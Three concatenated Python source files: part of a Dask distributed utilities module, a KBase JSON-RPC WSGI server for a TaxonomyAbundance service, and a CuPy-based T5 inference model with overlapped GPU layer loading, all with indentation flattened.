**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
    >>> parse_ports(8787)
    [8787]
    or a string:
    >>> parse_ports("8787")
    [8787]
    A sequential range of ports can be specified by a string which indicates
    the first and last ports which should be included in the sequence of ports:
    >>> parse_ports("8787:8790")
    [8787, 8788, 8789, 8790]
    An input of ``None`` is also valid and can be used to indicate that no port
    has been specified:
    >>> parse_ports(None)
    [None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
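# Usage sketch (hypothetical caller): ``result = await offload(pickle.dumps, obj)`` runs the
# blocking call on the single dedicated "Dask-Offload" thread instead of the event loop.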
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
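# Illustrative behaviour (not from the original source):
#   lru = LRU(maxsize=2)
#   lru["a"] = 1; lru["b"] = 2
#   _ = lru["a"]     # "a" becomes the most recently looked-up key
#   lru["c"] = 3     # evicts "b", the least recently looked-up key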
def clean_dashboard_address(addr, default_listen_ip=""):
"""
Examples
--------
>>> clean_dashboard_address(8787)
{'address': '', 'port': 8787}
>>> clean_dashboard_address(":8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("foo:8787")
{'address': 'foo', 'port': 8787}
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
return {"address": host, "port": port}
|
TaxonomyAbundanceServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from TaxonomyAbundance.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'TaxonomyAbundance'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from TaxonomyAbundance.TaxonomyAbundanceImpl import TaxonomyAbundance # noqa @IgnorePep8
impl_TaxonomyAbundance = TaxonomyAbundance(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'TaxonomyAbundance'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_TaxonomyAbundance.run_TaxonomyAbundance,
name='TaxonomyAbundance.run_TaxonomyAbundance',
types=[dict])
self.method_authentication['TaxonomyAbundance.run_TaxonomyAbundance'] = 'required' # noqa
self.rpc_service.add(impl_TaxonomyAbundance.status,
name='TaxonomyAbundance.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'TaxonomyAbundance ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
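# Usage sketch (added, assumes this module is imported rather than run directly):
#   port = start_server(newprocess=True)   # returns the bound port
#   ...                                     # issue JSON-RPC requests against localhost:port
#   stop_server()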
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
model.py
|
import threading
from typing import Callable, Generator, List, Union
import cupy
from ..seq2seq import Seq2SeqModel
from ...layers.transformer_block import TransformerBlockDecoder, TransformerBlockEncoder
from ...layers.encoder_kv import EncoderKeyValueProjection
from ...layers.position_bias import PositionBias
from ...layers.embedding import Embedding
from ...layers.layer_norm import LayerNorm
from ...layers.mask import InputMask
from ...layers.lm_head import LMHead
from ...layers.layer_list import LayerList
from .config import T5Configuration
from .tokenizer import T5Tokenizer
from .context import T5InferenceContext
from ...allocator import ReusedAllocator, SizeLimitedAllocator
import numpy as np
import logging
from ... import data
from ...utils import round_up
logger = logging.getLogger(__name__)
class T5(Seq2SeqModel):
def __init__(self, config : T5Configuration):
# Build Model
logger.info("Building model")
self.memory_overlap = config.MEMORY_OVERLAP
self.max_overlap_layers = max(config.NUM_ENCODER_LAYERS, config.NUM_DECODER_LAYERS)
if self.memory_overlap:
self.overlap_layers = min(config.OVERLAP_LAYERS, self.max_overlap_layers)
else:
self.overlap_layers = self.max_overlap_layers
self.encoder_only = config.ENCODER_ONLY
self.max_decoder_length = config.MAX_DECODER_LENGTH
self.dim_model = config.DIM_MODEL
logger.info("============ T5 ==============")
logger.info("MEM_OVERLAP: %s", self.memory_overlap)
logger.info("OVERLAP_LAYERS: %s", self.overlap_layers)
logger.info("ENCODER_ONLY: %s", self.encoder_only)
logger.info("MAX_DECODER_LENGTH: %s", self.max_decoder_length)
self.input_embedding = Embedding(config.VOCAB_SIZE, config.DIM_MODEL)
self.input_mask = InputMask(is_decoder=False)
self.encoder_position_bias = PositionBias(config.NUM_POSITION_BUCKETS, config.NUM_HEADS, is_decoder=False)
self.num_encoder = config.NUM_ENCODER_LAYERS
self.encoder = LayerList([
TransformerBlockEncoder(config.DIM_MODEL, config.DIM_FF, config.DIM_KV, config.NUM_HEADS)
for _ in range(config.NUM_ENCODER_LAYERS)
])
self.encoder_final_layer_nrom = LayerNorm(config.DIM_MODEL)
self.num_heads = config.NUM_HEADS
self.dim_qkv = config.DIM_KV
if not self.encoder_only:
self.decoder_position_bias = PositionBias(config.NUM_POSITION_BUCKETS, config.NUM_HEADS, is_decoder=True)
self.encoder_kv = EncoderKeyValueProjection(config.NUM_DECODER_LAYERS, config.DIM_MODEL, config.DIM_KV, config.NUM_HEADS)
self.lm_head = LMHead(config.VOCAB_SIZE, config.DIM_MODEL)
self.num_decoder = config.NUM_DECODER_LAYERS
self.decoder = LayerList([
TransformerBlockDecoder(config.DIM_MODEL, config.DIM_FF, config.DIM_KV, config.NUM_HEADS)
for _ in range(config.NUM_DECODER_LAYERS)
])
self.decoder_final_layer_nrom = LayerNorm(config.DIM_MODEL)
if config.MODEL_NAME is not None:
# init parameter
model_path = data.ensure_file(config.MODEL_NAME, "checkpoint.pt")
vocab_path = data.ensure_file(config.MODEL_NAME, "vocab.txt")
self.tokenizer = T5Tokenizer(vocab_path)
self.device = config.DEVICE
with self.device:
logger.info("Start loading parameters from disk to cpu")
self.load( open(model_path, "rb") )
logger.info("Start loading parameters from cpu to gpu")
load_stream = cupy.cuda.Stream()
if self.memory_overlap:
mx_size = 0
for i in range(config.NUM_ENCODER_LAYERS):
mx_size = max(self.encoder[i].nbytes, mx_size)
for i in range(config.NUM_DECODER_LAYERS):
mx_size = max(self.decoder[i].nbytes, mx_size)
if self.overlap_layers >= self.max_overlap_layers:
overlap_size = mx_size * self.max_overlap_layers * 2
elif self.overlap_layers * 2 >= self.max_overlap_layers:
overlap_size = mx_size * self.overlap_layers * 2 + (self.max_overlap_layers - self.overlap_layers) * mx_size
elif self.overlap_layers * 3 >= self.max_overlap_layers:
overlap_size = mx_size * self.overlap_layers * 3 + (self.max_overlap_layers - self.overlap_layers * 2) * mx_size
else:
overlap_size = mx_size * self.overlap_layers * 4
other_size = self.nbytes - self.encoder.nbytes - self.decoder.nbytes
logger.info("Using overlap loader: overlap_size %d, other_size: %d, dynamic_memory %d, memory_limit %d", overlap_size, other_size, config.DYNAMIC_MEMORY, config.MEMORY_LIMIT)
if overlap_size + other_size + config.DYNAMIC_MEMORY > config.MEMORY_LIMIT:
raise ValueError("memory limit not enough, at least %d bytes, but got %d bytes" % (overlap_size + other_size + config.DYNAMIC_MEMORY, config.MEMORY_LIMIT))
self.parameter_allocator = ReusedAllocator(other_size + (mx_size * self.overlap_layers * 2))
if self.overlap_layers >= self.max_overlap_layers:
self.overlap_allocator = [None, None]
elif self.overlap_layers * 2 >= self.max_overlap_layers:
self.overlap_allocator = [None, ReusedAllocator( (self.max_overlap_layers - self.overlap_layers) * mx_size )]
elif self.overlap_layers * 3 >= self.max_overlap_layers:
self.overlap_allocator = [ReusedAllocator( (self.max_overlap_layers - self.overlap_layers * 2) * mx_size ), ReusedAllocator( self.overlap_layers * mx_size )]
else:
self.overlap_allocator = [ReusedAllocator( self.overlap_layers * mx_size ), ReusedAllocator( self.overlap_layers * mx_size )]
self.overlap_allocator_status = [None, None]
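                # Added note (interpretation): the two overlap allocators double-buffer layer
                # weights, so the loader threads can copy the next group of ``overlap_layers``
                # layers to the GPU while the current group is being used for computation.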
self.variable_allocator = SizeLimitedAllocator(config.MEMORY_LIMIT - other_size - overlap_size)
for name, layer in self._sub_layers.items():
if name in ["encoder", "decoder"]:
# move first overlap_size layers to device
for i in range(min(self.overlap_layers, len(layer))):
layer[i].to_device( self.parameter_allocator, load_stream )
else:
layer.to_device( self.parameter_allocator, load_stream )
else:
if self.nbytes + config.DYNAMIC_MEMORY > config.MEMORY_LIMIT:
raise ValueError("memory limit not enough, at least %d bytes, but got %d bytes" % (self.nbytes + config.DYNAMIC_MEMORY, config.MEMORY_LIMIT))
logger.info("Using static loader: total: %d, dynamic_memory %d, memory_limit %d", self.nbytes, config.DYNAMIC_MEMORY, config.MEMORY_LIMIT)
self.parameter_allocator = ReusedAllocator(self.nbytes)
self.variable_allocator = SizeLimitedAllocator(config.MEMORY_LIMIT - self.nbytes)
self.to_device(self.parameter_allocator, load_stream)
self.device.synchronize()
self.load_stream = cupy.cuda.Stream(non_blocking=True)
self.calc_stream = cupy.cuda.Stream(non_blocking=True)
with self.calc_stream:
self.variable_allocator.alloc(config.DYNAMIC_MEMORY) # preallocate
self.device.synchronize()
logger.info("Cleaning useless parameters on cpu")
if self.memory_overlap:
for name, layer in self._sub_layers.items():
if name in ["encoder", "decoder"]:
# move first overlap_size layers to device
pass
else:
layer._remove_data()
for i in range(self.max_overlap_layers):
if i < self.overlap_layers:
self.encoder[i]._remove_data()
self.decoder[i]._remove_data()
else:
if i < self.num_encoder:
self.encoder[i]._try_pinned()
if i < self.num_decoder:
self.decoder[i]._try_pinned()
else:
self._remove_data()
logger.info("End of model initialization")
def encode_loader(self, barrier, load_stream):
with self.device:
for i in range(self.num_encoder):
if i % self.overlap_layers == 0:
load_stream.synchronize()
barrier.wait()
# sync here
if i + self.overlap_layers < self.num_encoder:
overlap_idx = ((i + self.overlap_layers) // self.overlap_layers) % 2
if self.overlap_allocator_status[overlap_idx] == i + 1:
continue
else:
olp_allocator = self.overlap_allocator[overlap_idx]
olp_allocator.reset()
for j in range(i + self.overlap_layers, min(i + self.overlap_layers * 2, self.num_encoder)):
logger.info("Load encoder layer %d", j)
self.encoder[j].to_device(olp_allocator, load_stream)
self.overlap_allocator_status[overlap_idx] = i + 1
def decode_loader(self, barrier, load_stream):
with self.device:
for i in range(self.num_decoder):
if i % self.overlap_layers == 0:
load_stream.synchronize()
barrier.wait()
# sync here
if i + self.overlap_layers < self.num_decoder:
overlap_idx = ((i + self.overlap_layers) // self.overlap_layers) % 2
if self.overlap_allocator_status[overlap_idx] == -(i + 1):
continue
else:
olp_allocator = self.overlap_allocator[overlap_idx]
olp_allocator.reset()
for j in range(i + self.overlap_layers, min(i + self.overlap_layers * 2, self.num_decoder)):
logger.info("Load decoder layer %d", j)
self.decoder[j].to_device(olp_allocator, load_stream)
self.overlap_allocator_status[overlap_idx] = -(i + 1)
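    # Added note (interpretation): encode()/decode_step() below run computation on
    # ``calc_stream`` while the loader threads above prefetch the next group of layers on
    # ``load_stream``; the Barrier(2) keeps the two threads in lockstep at every
    # ``overlap_layers`` boundary.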
def encode(self, input_idx : np.ndarray, input_length : List[int]):
barrier = threading.Barrier(2)
load_thread = threading.Thread(target=self.encode_loader, args=(barrier, self.load_stream), daemon=True)
load_thread.start()
with self.device:
calc_stream = self.calc_stream
batch_size, seq_len = input_idx.shape
if seq_len % 16 != 0:
nw_seq_len = round_up(seq_len, 16) # round up
nw_input_idx = np.zeros((batch_size, nw_seq_len), dtype=np.int64)
nw_input_idx[:, :seq_len] = input_idx
seq_len = nw_seq_len
input_idx = nw_input_idx
del nw_seq_len
del nw_input_idx
with calc_stream:
x = self.input_embedding.forward(self.variable_allocator, input_idx)
encoder_attn_mask = self.input_mask.forward(self.variable_allocator, input_length, seq_len)
x = x.transpose((0, 2, 1))
assert x.dtype == cupy.float16
x_pos = self.encoder_position_bias.forward(self.variable_allocator, seq_len, seq_len)
assert x_pos.shape == (1, self.num_heads, seq_len, seq_len)
assert x_pos.dtype == cupy.float16
for i in range(self.num_encoder):
if i % self.overlap_layers == 0:
calc_stream.synchronize()
barrier.wait()
barrier.reset()
# sync
logger.info("Calc encoder layer %d", i)
with calc_stream:
x = self.encoder[i].forward(
self.variable_allocator,
x,
encoder_attn_mask,
x_pos,
True
)
with calc_stream:
x = self.encoder_final_layer_nrom.forward(self.variable_allocator, x)
calc_stream.synchronize()
load_thread.join()
return T5InferenceContext(x, input_length) # (batch, dim_model, seq_len)
def _init_decoder_context(self, ctx : T5InferenceContext):
hidden_state = ctx.hidden_states
input_length = ctx.input_length
if self.encoder_only:
raise ValueError("T5-encoder only")
with self.device:
with self.calc_stream:
batch_size, _, seq_ipt_len = hidden_state.shape
# (batch, num_decoder, 2, num_heads, dim_kv, seq_ipt_len),
encoder_layers_kv = self.encoder_kv.forward(self.variable_allocator, hidden_state)
# (1, num_heads, max_decoder_length, max_decoder_length)
dec_pos = self.decoder_position_bias.forward(
self.variable_allocator,
self.max_decoder_length,
self.max_decoder_length
)
past_kv = self.variable_allocator.alloc_array((self.num_decoder, batch_size, 2, self.num_heads, self.dim_qkv, self.max_decoder_length), dtype=cupy.float32)
past_kv[:] = 0
encoder_mask = self.input_mask.forward(self.variable_allocator, input_length, seq_ipt_len)[:, :, 0]
